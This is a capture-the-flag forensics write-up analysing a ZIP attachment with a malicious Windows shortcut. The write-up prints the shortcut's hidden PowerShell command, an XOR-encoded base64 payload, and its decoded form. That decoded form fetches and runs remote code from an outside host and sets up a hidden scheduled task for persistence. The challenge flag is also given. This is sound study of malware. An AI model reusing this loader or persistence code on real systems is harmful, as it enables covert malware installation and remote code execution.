The SOC identified a bunch of suspicious emails with ZIP attachments. The zips don’t have executables in them, so how dangerous can they be?

Category: forensics

Solver: 3mb0, mp455

Flag: HTB{d4ng3r0Us_z1p_ZiP_z1pp3R}

Writeup

In the provided zip archive there is another archive callled zipper.zip. We can also extract this archive to the files zipper.jpg and zipper.lnk. As .lnk is the file extension for windows shortcuts we inspect its properties. As target there is

%comspec% /c powershel%LOCALAPPDATA:~-1% -eP bypasS -win Hi'dde'n -c '&{c:\users $v=dir -force -r -in zipper.zip|select -last 1;$key=[System.Text.Encoding]::UTF8.GetBytes("Ae%4@3SDs");$j=gc -LiteralPat $v.fullname;$j[$j.length-1]|iex;iex($pt)}'"

We can split this command into manageable parts:

  • Powershell executes the following commands
  • We determine the path of zipper.zip
  • We have a custom key: Ae%4@3SDs
  • We interpet and execute the last line of zipper.zip
$x = [System.Convert]::FromBase64String("MhFERjQeIzYcIgBWR2AeJC09JQpSZzRKPwFTCQxhUCVdczcQKRFERytAc2NcIg1EWidWc2sHL0VkfWAcNy0AIAdJUWcIdwsAFBFjQTJQEnQfACxxZTh1BnMjC1gBUS5FaTEAJBdVRi9VOigWakJ5dTBDFyUHIDl3WyFeOioUZl4FEBlYawswGxVvdxBKZg9CCgBWbBBAc3lTaSJAQG1kPi08Iw9AVzQTBC0dcld6dy9eIzEHJBd2TTNHNikjMwpBQSNHemomFCxhD2AXOTQRIgNvZyFiGxA8c1dhcnEBIwEhfEF8X3h8EB4DCyZ1TXV4Yg8WMj11R25gJiYANRdMWicbY2hFaF4FEBh5EB0GEBdWchR/ZnEqLSp0QgZKI2ROYUFqRxVHFTEBIiQVWAF6BxULBzASZAoYdBhUakFPRCJQNQ4gIDRtYA8BYQA1cFdVcRIIGiJbNQBWQG1DMjAbYUF9fgNqJhUBMiNxeHUGCig8EBNjTTARDxsaL0cMTyJBNiUYegdXUSFYaDlIYSxDHGEbJyEANUhVVTRbc2ArCyZ8QRFBIAInDVAQbSx8AjI1OBUMHTt9NjNeCBFAWWAeGjAWLDFcRCUTFy0BJAZRWzJKc2k1LhdGUWAeAyUHKUUBbApwCjEiMxZjYAwGZh0fDjRTcjlDaGRXJwlEU30RGxAxOgERWicAIXQmMjpfBTBsCS0jHh8URDAAATlRPF4FFjNHMjYHbBVXWyNWIDdTbBJMeiRcJBcHOAlgFAhaFyAWL0VVWzdWITcbJAlJGiVLNmRbaUIFE2sUfidTKABdFGgbPQEEZk4CGQ9RdG9UCwBGE2sUJ2RbOkIOE3AUeGMODyBRGmcYdBMWA0IOEyNfOiFUakJLE2sUJz9DPEIOE2kUeGNab01eE2sUYzk3LhICH2d9HytUakJkUBNHdG9UMyxLczsUeGNDPEwLE2sUOioFLi4CH2dWe2wIcRhNQDQUeGMDMl8KE2sUfC0dN0IOEyVAJ2NYZgxJXScUeGMSZk4CWm5bdG9UNQcCH2ccJCFUakJXQClDPCgSMgBIGy4UeGMGZk4CXzBcPyEAJQReBD0UeGNaaEwCHWAeFWQoAi1kZh0Aam1RYRkFWzVHfiIaLQAFEBh5EB0GEBdWchR/ZnEqLSp0QgZKIxgCCBNncXNhFAUAOT1cBxMHYCtDIARUGjBAYn9TZRFkRndUIH01dlRmZQRxODFBDwRyTSYOdGRcB0UKVzJWMjAWYUpWV2BeOioGNQAFGy1cc3FTbjFrFGJyIzQhNAtpWycRc2sgFUUVA3oDY2RcFTcFFjBcJCEBMg1AWCwdNjwWYUhSXQ5XPDMgNRxJcWB7OgAXJAsFGSVLNmQROBVERzMTfiIaLQAFE2sXCw4wGBB0RjN1BwhGdDxJexFFFT0DakJ5RQlFEQFAEyJkRzhrKncgdVZKBCFSImoDMlQFFmcIczcHIBdRGTBBPCcWMhYFGTdaHSAcNjZRTSx2cwwaBQFAWmBAMCwHIBZOR2AXJwUBdgJWDQYEYgciBSdOQXJ9MhMKJ14=");$pt = [System.Text.Encoding]::UTF8.GetString($(for ($i=0; $i -lt $x.length; $i++){$x[$i] -bxor $key[$i%$key.length]}))
  • We base64 decode the content
  • and decrypt it via the key
start-process -wiNdowStylE HiDden schtasks '/change /tn AI /disable';$OsUtFurcA0lAITQxFU7PJ=$env:userprofile+'\AppData\Roaming'; $Yk8OCZpJCPy5K1KesXPs = (Get-WmiObject Win32_ComputerSystemProduct).UUID; $jpbcfJSaQHTO22DF12pER=$Yk8OCZpJCPy5K1KesXPs.Substring(0,6); $XJCYuQrsFTL55YlOQvFyp = $OsUtFurcA0lAITQxFU7PJ+'\'+$jpbcfJSaQHTO22DF12pER;If(test-path $XJCYuQrsFTL55YlOQvFyp"\_in"){break;break;}; If(!(test-path $XJCYuQrsFTL55YlOQvFyp)){New-Item -ItemType Directory -Force -Path $XJCYuQrsFTL55YlOQvFyp; $flag="HTB{d4ng3r0Us_z1p_ZiP_z1pp3R}"}; "start-process -wiNdowStylE HiDden powershell.exe ((' '+'-c iex ((nEw'+'-Ob'+'Jec'+'t ({'+'0'+'}NEt.'+'WeB'+'clie'+'n'+'t{0}'+')'+').({'+'0}Dow'+'NLo'+'AdSt'+'rInG{'+'0}).'+'invoK'+'e(({0}htt'+'ps:/'+'/inv'+'est'+'ilig'+'a'+'n.h'+'tb'+'/we'+'rtipolasem/n'+'u'+'kpolesda{0}'+')))') -F [CHAR]39)" | out-file $XJCYuQrsFTL55YlOQvFyp\qIvBE3RGAsxXy3S43o0aaq.ps1; $tAr7gs9F71CQDBku2NaWyf=' /F /create /sc minute /mo 5 /TN "AppRunLog" /ST 07:00 /TR "powershell.exe -wiNdowStylE HiDden -exe bypass -file '+$XJCYuQrsFTL55YlOQvFyp+'\qIvBE3RGAsxXy3S43o0aaq.ps1 "'; start-process -wiNdowStylE HiDden schtasks $tAr7gs9F71CQDBku2NaWyf;

Hidden in these commands there is the flag: $flag="HTB{d4ng3r0Us_z1p_ZiP_z1pp3R}"};

flag